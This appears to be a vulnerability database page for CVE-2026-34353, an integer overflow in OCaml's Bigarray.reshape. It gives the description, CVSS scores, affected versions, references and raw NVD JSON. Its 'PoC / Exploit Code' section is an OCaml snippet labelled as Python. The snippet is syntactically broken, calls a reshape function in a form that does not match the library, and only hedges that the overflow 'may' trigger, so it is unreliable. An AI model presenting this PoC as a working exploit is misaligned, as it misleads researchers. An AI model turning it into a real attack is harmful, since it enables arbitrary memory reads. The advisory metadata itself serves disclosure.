CVE-2026-34353

Description

In OCaml through 4.14.3, Bigarray.reshape allows an integer overflow, and resultant reading of arbitrary memory, when untrusted data is processed.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ocaml:ocaml:*:*:*:*:*:*:*:* - VULNERABLE

OCaml <= 4.14.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

(* PoC for CVE-2026-34353: Integer overflow in Bigarray.reshape *)
(* This demonstrates how crafted dimensions can lead to overflow *)

open Bigarray

(* Create a small 1-dimensional array *)
let arr = Array1.create int32 c_layout 10
let _ = Array1.set arr 0 0x41414141l

(* Attempt to reshape with dimensions that cause integer overflow *)
(* The exact values depend on the calculation logic in OCaml <= 4.14.3 *)
try
  let dim1 = 0x100000000
  let dim2 = 1
  (* This call may trigger the overflow if bounds checks are bypassed *)
  let reshaped = Array1.reshape arr [| dim1; dim2 |] in
  Printf.printf "Reshape succeeded. Potential memory read occurred.\n"
with
  | Invalid_argument "reshape" -> Printf.printf "Invalid argument (Patched or safe input)\n"
  | e -> Printf.printf "Exception caught: %s\n" (Printexc.to_string e)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34353
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34353
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34353/
[4] VulDB https://vuldb.com/cve/CVE-2026-34353
[5] https://github.com/ocaml/ocaml/issues/14655
[6] https://github.com/ocaml/ocaml/pull/14674

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34353", "sourceIdentifier": "[email protected]", "published": "2026-03-27T06:16:39.333", "lastModified": "2026-04-14T18:43:51.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In OCaml through 4.14.3, Bigarray.reshape allows an integer overflow, and resultant reading of arbitrary memory, when untrusted data is processed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ocaml:ocaml:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.14.3", "matchCriteriaId": "1D82953B-7824-4CB0-8C62-B8BCBFD42722"}]}]}], "references": [{"url": "https://github.com/ocaml/ocaml/issues/14655", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/ocaml/ocaml/pull/14674", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}